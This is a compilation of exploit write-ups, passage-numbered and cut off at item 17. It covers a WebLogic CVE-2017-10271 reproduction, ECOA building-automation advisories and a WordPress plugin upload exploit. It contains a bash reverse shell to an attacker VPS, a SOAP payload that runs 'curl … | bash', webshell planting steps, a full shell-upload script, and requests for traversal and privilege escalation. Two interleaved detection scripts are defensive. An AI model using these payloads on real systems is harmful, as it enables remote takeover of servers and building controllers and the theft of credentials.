4. Use the WebLogic WLS component vulnerability (CVE-2017-10271) to call PowerShell on Windows to download the sample and execute malicious code.
5. In this incident, CVE-2017-3248 failed but CVE-2017-10271 was exploited successfully; the server was taken over by the attacker and traces were left in the system logs.

0x03 Analysis and exploitation

This vulnerability lives in wls-wsat.war. The component uses WebLogic's own web service handler to process SOAP requests. The XML data is first obtained in the weblogic.wsee.jaxws.workcontext.WorkContextServerTube class and finally handed to XMLDecoder for parsing. The call chain that parses the XML is:

weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest
weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld
weblogic.wsee.workarea.WorkContextXmlInputAdapter

First look at the weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest method. After localHeader1 is obtained it is passed to the readHeaderOld method. Its content is the data wrapped in work:WorkContext; continue following it.

In the weblogic.wsee.jaxws.workcontext.WorkContextTube.readHeaderOld method, the WorkContextXmlInputAdapter class is instantiated, the XML-format serialized data that was obtained is passed to that class's constructor, and deserialization is finally performed through XMLDecoder.

The XMLDecoder deserialization problem was discovered in 2013. It has recently been used again in WebLogic, which shows how bad the security problems in the Java ecosystem are.

It is worth mentioning that this vulnerability has two CVE numbers: the patch Oracle provided for CVE-2017-3506 checks whether the XML contains an object node, and replacing object with void bypasses that patch. Users must therefore apply the patch that Oracle provided in October when repairing.

0x04 Vulnerability reproduction

Required environment: VPS server: ubuntu16.4, IP: x.x.x.x
Required software: Burp Suite

WebLogic generally opens ports 7001 and 7002. When accessing the /wls-wsat/CoordinatorPortType11 directory, a page like the following figure indicates that the vulnerability may exist:

http://11.203.x.x/wls-wsat/CoordinatorPortType

First install Python 2.7 on the external network server:

sudo apt-get install python2.7

Then on the external VPS server, use vim to write a reverse shell script such as a.sh (fill in your own server IP and the port nc listens on):

bash -i >& /dev/tcp/vpsip/ncport 0>&1

or

/bin/bash -i >& /dev/tcp/vpsip/ncport 0>&1

Connect to the server with Xshell and run (the Python server port and nc port can be chosen freely):

python -m SimpleHTTPServer pythonport
nc -lvp ncport

Once these are running, the PoC can be tested from the PC:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 11.203.x.x
Accept-Encoding: identity
Content-Length: 695
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>curl http://x.x.x.x.x:81/a.sh | bash</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

Copy the above into Burp Suite's Repeater. Note that Host: 11.203.x.x must be changed to the target being attacked, and the target host and port of the request must match the target address and port as well. The part

<void index="2">
  <string>curl http://x.x.x.x.x:81/a.sh | bash</string>
</void>

must also be changed to the real values. Then press Go in Repeater. The server returns:

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 23 Dec 2017 05:16:01 GMT
Content-Type: text/xml; charset=utf-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 262

<?xml version='1.0' encoding='UTF-8'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><S:Fault xmlns:ns4="http://www.w3.org/2003/05/soap-envelope"><faultcode>S:Server</faultcode><faultstring>0</faultstring></S:Fault></S:Body></S:Envelope>

After that a reverse shell appears on the VPS.

If you want a webshell instead: cd directly into the servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ directory, which is the system default directory. Then wget the JSP script through the PoC and use the mv command to move it into this directory. The most important point is that when connecting with China Chopper, the path to connect to is the script file under the /bea_wls_internal/ directory, not the directory it was placed in.

Attached PoC check script:

#!/bin/env python2
# coding: utf-8
import requests
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# disable the insecure-request warnings for self-signed HTTPS targets
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Address used to determine the WebLogic vulnerability; without a PoC only this address can be judged for now
check_addr = '/wls-wsat/CoordinatorPortType11'
shell_addr = '/bea_wls_internal/connect.jsp'
heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'SOAPAction': '',
    'Content-Type': 'text/xml;charset=UTF-8'
}
post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/sh</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>find $DOMAIN_HOME -type d -name bea_wls_internal | while read f; do find $f -type f -name index.html; done | while read ff; do echo vulexist > $(dirname $ff)/connect.jsp; done</string>
            </void>
          </array>
          <void method="start"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''


def check(url):
    # print('detecting %d url: %s' % (status_num, url))
    vuln_url = url + check_addr
    resp = requests.get(vuln_url, verify=False, timeout=10)
    if resp.status_code == 200:
        rsp = requests.post(vuln_url, headers=heads, data=post_str.encode('utf-8'), verify=False, timeout=10)
        content = rsp.content
        if re.search(r'java\.lang\.ProcessBuilder', content, re.I):
            # print 'getshell success, shell is: %s' % (url + shell_addr)
            string_to_write = 'Congratulations! The WebLogic remote command execution vulnerability exists:\n' + url + shell_addr + '\n'
            print string_to_write
        else:
            print 'fail'
    else:
        print resp.status_code


# Determine whether the vulnerability exists
# target = sys.argv[1]
target = 'https://x.x.x.com'
print 'checking weblogic vul of ' + target
check(target)
# The target passed in has the form http://www.baidu.com (no port)

0x05 Repair suggestions

1. Temporary solution

According to analysis of the attacker's PoC, the CoordinatorPortType interface that is used belongs to the wls-wsat component. If this component is not needed in the WebLogic server cluster, it is recommended to back it up and remove it temporarily, restoring it once protection is in place.

Delete the WebLogic wls-wsat component according to the actual environment path:

rm -f /home/weblogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f /home/weblogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf /home/weblogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

Restart the WebLogic domain controller service:

DOMAIN_NAME/bin/stopWebLogic.sh           # stop the service
DOMAIN_NAME/bin/startManagedWebLogic.sh   # start the service

WebLogic must be restarted after deleting the files above. Check whether http://weblogic_ip/wls-wsat/ now returns a 404 page.

2. Official patch

Go to Oracle's official website to download the security patch provided in October:
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

For the upgrade process refer to:
http://blog.csdn.net/qqlifu/article/details/49423839

3. Online inspection tools

http://Adlab.venustech.com.cn/vulscan
https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?page_id=12

--------------------------------------------------------------------------------

Summary of experience:

On Linux, one listening port can be used in turn by multiple IPs.
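An added detection example, written for this page rather than taken from the article or from Oracle: it parses a request to a /wls-wsat/ endpoint and flags the markers the analysis above describes, namely XMLDecoder data inside the work:WorkContext SOAP header, instantiation of ProcessBuilder, the start() method call, and the <void class=...> form that the text notes was used to bypass the CVE-2017-3506 patch. It is the kind of check a WAF rule or a log-replay script would carry. The request bodies are constructed samples with a harmless placeholder command, and the function and constant names are the example's own.

```python
"""Flag CVE-2017-10271-style WorkContext payloads in SOAP requests (added example)."""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# Classes with no legitimate use inside a WorkContext header; they are the
# building blocks of the public exploit payloads.
DANGEROUS_CLASSES = {
    "java.beans.xmldecoder",
    "java.lang.processbuilder",
    "java.lang.runtime",
    "java.io.fileoutputstream",
}


def inspect_request(path, body):
    """Return a list of findings for one request (path + raw XML body).

    Only /wls-wsat/ endpoints are inspected, mirroring the component the
    article identifies; other paths are ignored.
    """
    findings = []
    if not path.lower().startswith("/wls-wsat/"):
        return findings
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable XML posted to wls-wsat endpoint"]

    header = root.find("{%s}Header" % SOAP_NS)
    ctx = header.find("{%s}WorkContext" % WORK_NS) if header is not None else None
    java = ctx.find("java") if ctx is not None else None
    if java is None:
        return findings  # no XMLDecoder-formatted data in the header

    findings.append("WorkContext header carries XMLDecoder serialized data")
    for elem in java.iter():
        cls = elem.get("class", "")
        if cls.lower() in DANGEROUS_CLASSES:
            findings.append("<%s> instantiates %s" % (elem.tag, cls))
            # The CVE-2017-3506 patch only rejected <object>; payloads moved the
            # class attribute onto <void>, which XMLDecoder treats the same way.
            if elem.tag == "void":
                findings.append("class on <void>: CVE-2017-3506 patch bypass pattern")
        if elem.tag == "void" and elem.get("method") == "start":
            findings.append('<void method="start"/>: process launch')
    return findings


# Constructed request bodies; the command is a harmless placeholder.
BYPASS_PAYLOAD = (
    '<soapenv:Envelope xmlns:soapenv="%s"><soapenv:Header>'
    '<work:WorkContext xmlns:work="%s">'
    '<java version="1.8.0_131" class="java.beans.XMLDecoder">'
    '<void class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="1"><void index="0">'
    '<string>/bin/true</string></void></array>'
    '<void method="start"/></void></java>'
    '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'
) % (SOAP_NS, WORK_NS)

# Same payload in the older <object> form that the CVE-2017-3506 patch rejects.
OBJECT_PAYLOAD = BYPASS_PAYLOAD.replace(
    '<void class="java.lang.ProcessBuilder">', '<object class="java.lang.ProcessBuilder">'
).replace('<void method="start"/></void>', '<void method="start"/></object>')

BENIGN_BODY = (
    '<soapenv:Envelope xmlns:soapenv="%s"><soapenv:Header/>'
    '<soapenv:Body><ping/></soapenv:Body></soapenv:Envelope>'
) % SOAP_NS


if __name__ == "__main__":
    for name, body in (("bypass", BYPASS_PAYLOAD), ("object", OBJECT_PAYLOAD), ("benign", BENIGN_BODY)):
        print(name, inspect_request("/wls-wsat/CoordinatorPortType", body))
```

Because the check keys on the WorkContext header rather than on any particular command string, it is not defeated by changing the command, and the separate "bypass pattern" finding tells an analyst whether the sender already knows the server is patched against the original CVE-2017-3506 form.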
13. # Exploit Title: ECOA Building Automation System - Local File Disclosure
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Local File Disclosure Vulnerability

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers on the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator follows the basic Web concept of simple and convenient operation, sharing risk and ensuring security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols such as XML, Modbus TCP/IP, BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipment or systems in buildings.

The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve the management and audit trail capabilities of building controllers and microprocessor based equipment or systems. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipment or systems without any need for major upgrades or equipment replacement, and allows cost savings. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor based equipment or systems to allow full building control. The RiskBuster provides a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls across the Internet directly. The ECS0000160 can totally replace and improve a typical system that has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, and not only from a single specific operating system. It is a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation based on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with RS485 options.

#5 HOME SERVER-EHC9246150 - This web based home server is specified for hidden installation, with a 32-bit microcomputer and I/O peripheral expansion circuit, which includes a D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contain the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, in premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and reveal sensitive and system information.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia @zeroscience

Advisory ID: ZSL-2021-5679
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php

25.06.2021

--

Arbitrary File Disclosure
-------------------------

- Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information.

Request:

POST /viewlog.jsp HTTP/1.1
Host: 192.168.1.3:8080

yr=2021&mh=6&fname=../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
...
...
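The three ECOA web issues in this listing (the unauthenticated syspara.dat/images.dat download, the UCLS cookie bypass, and the 'fname' traversal in viewlog.jsp and menu.jsp) share one root cause: the device trusts values the client supplies. As an added example that is not part of any of the advisories and not vendor code, the following Python runs those three checks over request records of the kind a reverse proxy or a packet capture in front of the controller would yield, so an operator can spot the traffic pattern before patching is possible. The request records are constructed from the requests shown above; the record layout, the threshold constant and all function names are the example's own assumptions.

```python
"""Flag ECOA BAS abuse patterns in captured HTTP requests (added example)."""
from urllib.parse import urlsplit, parse_qs, unquote

SENSITIVE_FILES = {"/syspara.dat", "/images.dat"}  # configuration with plain-text credentials
PRIV_COOKIE = "UCLS"
PRIV_THRESHOLD = 19  # the advisory states values >= 19 bypass the access checks

# Constructed request records (client, target URL, Cookie header, optional POST body).
SAMPLE_REQUESTS = [
    {"client": "10.0.0.5", "method": "GET",
     "target": "/menu.jsp?fname=../sysuse/system01.frm&time=5",
     "cookie": "JSESSIONID=abc; UCLS=251; UID=zero; ROOT=FOUND"},
    {"client": "10.0.0.7", "method": "GET", "target": "/syspara.dat",
     "cookie": "UCLS=19"},
    {"client": "10.0.0.9", "method": "POST", "target": "/viewlog.jsp",
     "cookie": "UCLS=1",
     "body": "yr=2021&mh=6&fname=../../../../../../../../etc/passwd"},
    {"client": "10.0.0.11", "method": "GET", "target": "/menu.jsp?fname=main.frm",
     "cookie": "JSESSIONID=def; UCLS=1"},
]


def parse_cookies(header):
    """Split a Cookie header into a dict; malformed pairs are ignored."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            key, _, value = part.strip().partition("=")
            cookies[key] = value
    return cookies


def has_traversal(value):
    """True if a path parameter climbs out of its directory, after URL decoding.

    Decoding twice catches %252e-style double encoding; backslashes are
    normalised so Windows-style separators are treated the same way.
    """
    decoded = unquote(unquote(value)).replace("\\", "/")
    return ".." in decoded.split("/")


def inspect(rec):
    """Return the findings for one request record (empty list if clean)."""
    findings = []
    cookies = parse_cookies(rec.get("cookie", ""))
    ucls = cookies.get(PRIV_COOKIE)
    if ucls is not None:
        if ucls.isdigit() and int(ucls) >= PRIV_THRESHOLD:
            findings.append("UCLS=%s: client-asserted privilege level at or above bypass threshold" % ucls)
        elif not ucls.isdigit():
            findings.append("UCLS=%r: non-numeric privilege cookie" % ucls)

    url = urlsplit(rec["target"])
    if url.path in SENSITIVE_FILES:
        findings.append("direct download of %s" % url.path)

    # 'fname' may arrive in the query string (menu.jsp) or the POST body (viewlog.jsp).
    params = parse_qs(url.query)
    params.update(parse_qs(rec.get("body", "")))
    for fname in params.get("fname", []):
        if has_traversal(fname):
            findings.append("fname=%s: path traversal" % fname)
    return findings


def scan(records):
    """Return (client, findings) for every record that produced at least one finding."""
    hits = []
    for rec in records:
        findings = inspect(rec)
        if findings:
            hits.append((rec["client"], findings))
    return hits


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_REQUESTS):
        for f in findings:
            print("%-12s %s" % (client, f))
```

The UCLS check is deliberately blunt: on this device a privilege level carried in a client cookie is never trustworthy, so any value at or above the threshold from a network segment that should not hold operators is worth an alert, and the fix on the server side is to derive the privilege level from the server-held session rather than from the cookie.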
14. # Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

from os import path
import requests
import sys


def print_banner():
    print("Download From Files <= 1.48 - Arbitrary File Upload")
    print("Author -> spacehen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    # The plugin's AJAX upload handler answers with "Sikeres" (Hungarian for
    # "successful"), which identifies the endpoint as present.
    response = requests.get(uri)
    raw = response.text
    if ("Sikeres" in raw):
        return True
    else:
        return False


def main():
    print_banner()
    if(len(sys.argv) != 3):
        print_usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]

    ajax_action = 'download_from_files_617_fileupload'
    admin = '/wp-admin/admin-ajax.php'

    uri = base + admin + '?action=' + ajax_action
    check = vuln_check(uri)
    if(check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    # The allowed-extension list and upload directory are taken from the
    # request itself, which is the root cause of the vulnerability.
    files = {'files[]' : open(file_path, 'rb')}
    data = {
        "allowExt" : "php4,phtml",
        "filesName" : "files",
        "maxSize" : "1000",
        "uploadDir" : "."
    }

    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data)
    file_name = path.basename(file_path)
    if("ok" in response.text):
        print("Shell Uploaded!")
        if(base[-1] != '/'):
            base += '/'
        print(base + "wp-admin/" + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)


main()
15. # Exploit Title: ECOA Building Automation System - Remote Privilege Escalation
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Remote Privilege Escalation

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers over the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator follows a Web-based concept that makes operation simple and convenient, totally shares risk and makes sure of security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols like XML, Modbus TCP/IP, BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor-based equipment or systems in buildings.

The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve building controller and microprocessor-based equipment or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor-based equipment or systems without any need for major upgrades or equipment replacement, allowing cost savings. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor-based equipment or systems to allow full building control. The RiskBuster provides a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

#3 The ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls across the Internet directly. The ECS0000160 can totally replace and improve a typical system that always has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, and is not limited to connecting with a single specific operating system.

It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation, working on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with RS485 options.

#5 HOME SERVER-EHC9246150 - This web-based home server has the specifications of hidden installation, a 32-bit microcomputer and an I/O peripheral expansion circuit, which includes: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contain the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, for premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller is vulnerable to a weak access control mechanism allowing any user to escalate privileges by disclosing credentials of administrative accounts in plain-text.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5677
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php

25.06.2021

--

Privilege Escalation
--------------------

- Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text.

Request:

$ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed

<tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>embed</td><td>power</td><td>19</td><td>&nbsp;</td><tr autoid='1' tgs='' ><td><input type='checkbox' onclick='onchk(this);' ></td><td>root</td><td>embed</td><td>19</td><td>&nbsp;</td><input type='hidden' name='delrow' value='' >
16. # Exploit Title: ECOA Building Automation System - Arbitrary File Deletion
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Arbitrary File Deletion

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) is designed to provide you with the latest in Human Machine Interface (HMI) technology for complete monitoring and control management. It may be used singly for small and medium sized facilities, or linked together via high-speed Ethernet to other servers over the World Wide Web (WWW) or a Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator follows a Web-based concept that makes operation simple and convenient, totally shares risk and makes sure of security. Even remote sites may be controlled and monitored through the Ethernet port, based on standard transfer protocols like XML, Modbus TCP/IP, BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with the appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor-based equipment or systems in buildings.

The management functions provided by the RiskBuster, such as trend logging and alarm generation, improve building controller and microprocessor-based equipment or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor-based equipment or systems without any need for major upgrades or equipment replacement, allowing cost savings. The process control functions provided by the RiskBuster allow global control actions to be implemented across any building controllers and microprocessor-based equipment or systems to allow full building control. The RiskBuster provides a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be installed anywhere in the building.

#3 The ECM0000160 Digital Logic Controller (DLC) is a pre-programmed controller intended for Building Automation Systems, environment control systems, HVAC control systems and other types of equipment. Being fully programmable, it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on a 32-bit series microcomputer, with an on-board clock and two RS-485 local buses.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accesses information but also monitors and controls across the Internet directly. The ECS0000160 can totally replace and improve a typical system that always has a tedious panel and complex working process. An obvious benefit to our customers is that the ECS0000160 enables them to interact with their systems anytime, anywhere, and is not limited to connecting with a single specific operating system.

It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc., all through web-page operation, working on standard Internet transmission protocols. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports serial ports with RS485 options.

#5 HOME SERVER-EHC9246150 - This web-based home server has the specifications of hidden installation, a 32-bit microcomputer and an I/O peripheral expansion circuit, which includes: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contain the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It is mainly used in building control, plant monitoring, air monitoring, lighting and power control, for premises such as buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause a denial of service scenario.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5680
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php

25.06.2021

--

Arbitrary File Deletion
-----------------------

- An attacker can delete any file by abusing the 'cfile' GET parameter in the fmanerdel applet and using a traversal sequence.

Request:

GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1
17. # Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Missing Encryption Of Sensitive Information

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

